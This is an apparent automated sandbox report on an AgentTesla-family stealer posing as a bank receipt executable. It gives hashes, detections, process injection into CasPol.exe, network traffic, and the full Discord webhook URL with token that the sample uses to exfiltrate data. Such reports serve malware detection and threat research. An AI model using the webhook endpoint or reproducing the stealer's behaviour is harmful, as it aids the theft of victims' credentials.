        Process Injection        		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        e-dekont-20230206.exe41%ReversingLabsByteCode-MSIL.Trojan.GenSteal
        e-dekont-20230206.exe55%VirustotalBrowse
        e-dekont-20230206.exe100%Joe Sandbox ML

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        1.2.CasPol.exe.400000.0.unpack100%AviraHEUR/AGEN.1203035Download File

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://discord.com0%URL Reputationsafe
        http://discord.com0%URL Reputationsafe
        https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osr0%Avira URL Cloudsafe
        https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F310%Avira URL Cloudsafe
        https://discord.com4Dp0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        discord.com
        		162.159.135.232
        		truetrue
          		unknown
          api4.ipify.org
          		64.185.227.155
          		truefalse
            		high
            api.ipify.org
            		unknown
            		unknownfalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://api.ipify.org/false
                		high
                https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osrtrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://api.ipify.orgCasPol.exe, 00000001.00000002.558103667.0000000003391000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://discord.comCasPol.exe, 00000001.00000002.558103667.00000000033F4000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://discord.comCasPol.exe, 00000001.00000002.558103667.00000000033F4000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCasPol.exe, 00000001.00000002.558103667.0000000003391000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://discord.com4DpCasPol.exe, 00000001.00000002.558103667.00000000033F4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31CasPol.exe, 00000001.00000002.558103667.0000000003391000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    64.185.227.155
                    		api4.ipify.orgUnited States
                    		18450WEBNXUSfalse
                    162.159.135.232
                    		discord.comUnited States
                    		13335CLOUDFLARENETUStrue

                    General Information

                    Joe Sandbox Version:36.0.0 Rainbow Opal
                    Analysis ID:800718
                    Start date and time:2023-02-07 18:40:32 +01:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 8m 54s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:5
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample file name:e-dekont-20230206.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@3/1@3/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 17.5% (good quality ratio 13.2%)
                    • Quality average: 49.2%
                    • Quality standard deviation: 37.2%
                    HCA Information:
                    • Successful, ratio: 95%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ctldl.windowsupdate.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    18:41:28API Interceptor994x Sleep call for process: CasPol.exe modified

                    Joe Sandbox View / Context

                    IPs

                    No context

                    Domains

                    No context

                    ASNs

                    No context

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\e-dekont-20230206.exe.log

                    Download File
                    Process:C:\Users\user\Desktop\e-dekont-20230206.exe
                    File Type:CSV text
                    Category:dropped
                    Size (bytes):226
                    Entropy (8bit):5.354940450065058
                    Encrypted:false
                    SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                    MD5:B10E37251C5B495643F331DB2EEC3394
                    SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                    SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                    SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..

                    Static File Info

                    General

                    File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                    Entropy (8bit):7.959804344180061
                    TrID:
                    • Win64 Executable GUI Net Framework (217006/5) 47.53%
                    • Win64 Executable GUI (202006/5) 44.25%
                    • Win64 Executable (generic) Net Framework (21505/4) 4.71%
                    • Win64 Executable (generic) (12005/4) 2.63%
                    • Generic Win/DOS Executable (2004/3) 0.44%
                    File name:e-dekont-20230206.exe
                    File size:695808
                    MD5:33a5f92deee382035467caff29a8d487
                    SHA1:7e6daec4a2a4dde0f5148df4165fa8cebb7011e4
                    SHA256:e3b4406836308220da7989e5d539486ee1b71b4cc25a822e056993ab44675666
                    SHA512:c2c3a2ffc2719245166a561050a0c4d9ece584dea47997bb5db1cc30885e31e2a5af3cfbb27526835b10bdda71b572c307e8704a1ac53e9119cfe63c760f66af
                    SSDEEP:12288:vjsouJ3dUctF0KHbYXj/oNmsNjMQWwBTMYvwgScpK3J+ZBJwsscBDZn0Vx1NdB:2NUc7TbEDoNtQQWwKYvJScg63scDnu
                    TLSH:46E422177ACF0214D49829B282EF076503E95B85A1B7DABD3F4573AD06723E6BE43702
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........................z... ........... ....@...... ....................................`................................

                    File Icon

                    Icon Hash:92aca8b2b2a2b286

                    Static PE Info

                    General

                    Entrypoint:0x400000
                    Entrypoint Section:
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Time Stamp:0xEC8B859F [Tue Oct 4 11:38:07 2095 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:

                    Entrypoint Preview

                    Instruction
                    dec ebp
                    pop edx
                    nop
                    add byte ptr [ebx], al
                    add byte ptr [eax], al
                    add byte ptr [eax+eax], al
                    add byte ptr [eax], al

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xac0000x1b8c.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                    IMAGE_DIRECTORY_ENTRY_DEBUG0xa98da0x1c.text
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x20000xa79740xa7a00False0.9695758179530202data7.97077131969678IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .sdata0xaa0000x1e80x200False0.86328125data6.5950997415198165IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0xac0000x1b8c0x1c00False0.34444754464285715data5.438495976746426IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                    Resources

                    NameRVASizeTypeLanguageCountry
                    RT_ICON0xac1600x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224
                    RT_ICON0xad2080x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088
                    RT_GROUP_ICON0xad6700x22data
                    RT_VERSION0xad6940x30cdata
                    RT_MANIFEST0xad9a00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                    Network Behavior

                    Snort IDS Alerts

                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    192.168.2.5162.159.135.232497034432851779 02/07/23-18:41:32.301093TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49703443192.168.2.5162.159.135.232

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Feb 7, 2023 18:41:27.266633987 CET49702443192.168.2.564.185.227.155
                    Feb 7, 2023 18:41:27.266757011 CET4434970264.185.227.155192.168.2.5
                    Feb 7, 2023 18:41:27.266869068 CET49702443192.168.2.564.185.227.155
                    Feb 7, 2023 18:41:27.355532885 CET49702443192.168.2.564.185.227.155
                    Feb 7, 2023 18:41:27.355787039 CET4434970264.185.227.155192.168.2.5
                    Feb 7, 2023 18:41:27.679862976 CET4434970264.185.227.155192.168.2.5
                    Feb 7, 2023 18:41:27.680044889 CET49702443192.168.2.564.185.227.155
                    Feb 7, 2023 18:41:27.696712971 CET49702443192.168.2.564.185.227.155
                    Feb 7, 2023 18:41:27.696759939 CET4434970264.185.227.155192.168.2.5
                    Feb 7, 2023 18:41:27.697472095 CET4434970264.185.227.155192.168.2.5
                    Feb 7, 2023 18:41:27.746340990 CET49702443192.168.2.564.185.227.155
                    Feb 7, 2023 18:41:28.034023046 CET49702443192.168.2.564.185.227.155
                    Feb 7, 2023 18:41:28.034092903 CET4434970264.185.227.155192.168.2.5
                    Feb 7, 2023 18:41:28.132925987 CET4434970264.185.227.155192.168.2.5
                    Feb 7, 2023 18:41:28.133024931 CET4434970264.185.227.155192.168.2.5
                    Feb 7, 2023 18:41:28.133107901 CET49702443192.168.2.564.185.227.155
                    Feb 7, 2023 18:41:28.134315968 CET49702443192.168.2.564.185.227.155
                    Feb 7, 2023 18:41:32.177478075 CET49703443192.168.2.5162.159.135.232
                    Feb 7, 2023 18:41:32.177515984 CET44349703162.159.135.232192.168.2.5
                    Feb 7, 2023 18:41:32.177587032 CET49703443192.168.2.5162.159.135.232
                    Feb 7, 2023 18:41:32.178462982 CET49703443192.168.2.5162.159.135.232
                    Feb 7, 2023 18:41:32.178472042 CET44349703162.159.135.232192.168.2.5
                    Feb 7, 2023 18:41:32.237952948 CET44349703162.159.135.232192.168.2.5
                    Feb 7, 2023 18:41:32.238046885 CET49703443192.168.2.5162.159.135.232
                    Feb 7, 2023 18:41:32.240590096 CET49703443192.168.2.5162.159.135.232
                    Feb 7, 2023 18:41:32.240601063 CET44349703162.159.135.232192.168.2.5
                    Feb 7, 2023 18:41:32.241060019 CET44349703162.159.135.232192.168.2.5
                    Feb 7, 2023 18:41:32.243566990 CET49703443192.168.2.5162.159.135.232
                    Feb 7, 2023 18:41:32.243582010 CET44349703162.159.135.232192.168.2.5
                    Feb 7, 2023 18:41:32.300604105 CET44349703162.159.135.232192.168.2.5
                    Feb 7, 2023 18:41:32.300971985 CET49703443192.168.2.5162.159.135.232
                    Feb 7, 2023 18:41:32.300987959 CET44349703162.159.135.232192.168.2.5
                    Feb 7, 2023 18:41:32.434633017 CET44349703162.159.135.232192.168.2.5
                    Feb 7, 2023 18:41:32.434804916 CET44349703162.159.135.232192.168.2.5
                    Feb 7, 2023 18:41:32.434914112 CET49703443192.168.2.5162.159.135.232
                    Feb 7, 2023 18:41:32.509637117 CET49703443192.168.2.5162.159.135.232

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Feb 7, 2023 18:41:27.189271927 CET6064953192.168.2.58.8.8.8
                    Feb 7, 2023 18:41:27.209341049 CET53606498.8.8.8192.168.2.5
                    Feb 7, 2023 18:41:27.222088099 CET5144153192.168.2.58.8.8.8
                    Feb 7, 2023 18:41:27.244609118 CET53514418.8.8.8192.168.2.5
                    Feb 7, 2023 18:41:32.139256954 CET4917753192.168.2.58.8.8.8
                    Feb 7, 2023 18:41:32.159280062 CET53491778.8.8.8192.168.2.5

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Feb 7, 2023 18:41:27.189271927 CET192.168.2.58.8.8.80x302eStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                    Feb 7, 2023 18:41:27.222088099 CET192.168.2.58.8.8.80x612dStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                    Feb 7, 2023 18:41:32.139256954 CET192.168.2.58.8.8.80x8350Standard query (0)discord.comA (IP address)IN (0x0001)false

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Feb 7, 2023 18:41:27.209341049 CET8.8.8.8192.168.2.50x302eNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                    Feb 7, 2023 18:41:27.209341049 CET8.8.8.8192.168.2.50x302eNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                    Feb 7, 2023 18:41:27.209341049 CET8.8.8.8192.168.2.50x302eNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                    Feb 7, 2023 18:41:27.209341049 CET8.8.8.8192.168.2.50x302eNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                    Feb 7, 2023 18:41:27.244609118 CET8.8.8.8192.168.2.50x612dNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                    Feb 7, 2023 18:41:27.244609118 CET8.8.8.8192.168.2.50x612dNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                    Feb 7, 2023 18:41:27.244609118 CET8.8.8.8192.168.2.50x612dNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                    Feb 7, 2023 18:41:27.244609118 CET8.8.8.8192.168.2.50x612dNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                    Feb 7, 2023 18:41:32.159280062 CET8.8.8.8192.168.2.50x8350No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                    Feb 7, 2023 18:41:32.159280062 CET8.8.8.8192.168.2.50x8350No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                    Feb 7, 2023 18:41:32.159280062 CET8.8.8.8192.168.2.50x8350No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                    Feb 7, 2023 18:41:32.159280062 CET8.8.8.8192.168.2.50x8350No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                    Feb 7, 2023 18:41:32.159280062 CET8.8.8.8192.168.2.50x8350No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false

                    HTTP Request Dependency Graph

                    • api.ipify.org
                    • discord.com

                    Statistics

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:18:41:24
                    Start date:07/02/2023
                    Path:C:\Users\user\Desktop\e-dekont-20230206.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Users\user\Desktop\e-dekont-20230206.exe
                    Imagebase:0x22e8d880000
                    File size:695808 bytes
                    MD5 hash:33A5F92DEEE382035467CAFF29A8D487
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Reputation:low

                    General

                    Target ID:1
                    Start time:18:41:25
                    Start date:07/02/2023
                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
                    Imagebase:0xc80000
                    File size:107624 bytes
                    MD5 hash:F866FC1C2E928779C7119353C3091F0C
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Yara matches:
                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.558103667.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:moderate

                    Disassembly

                    No disassembly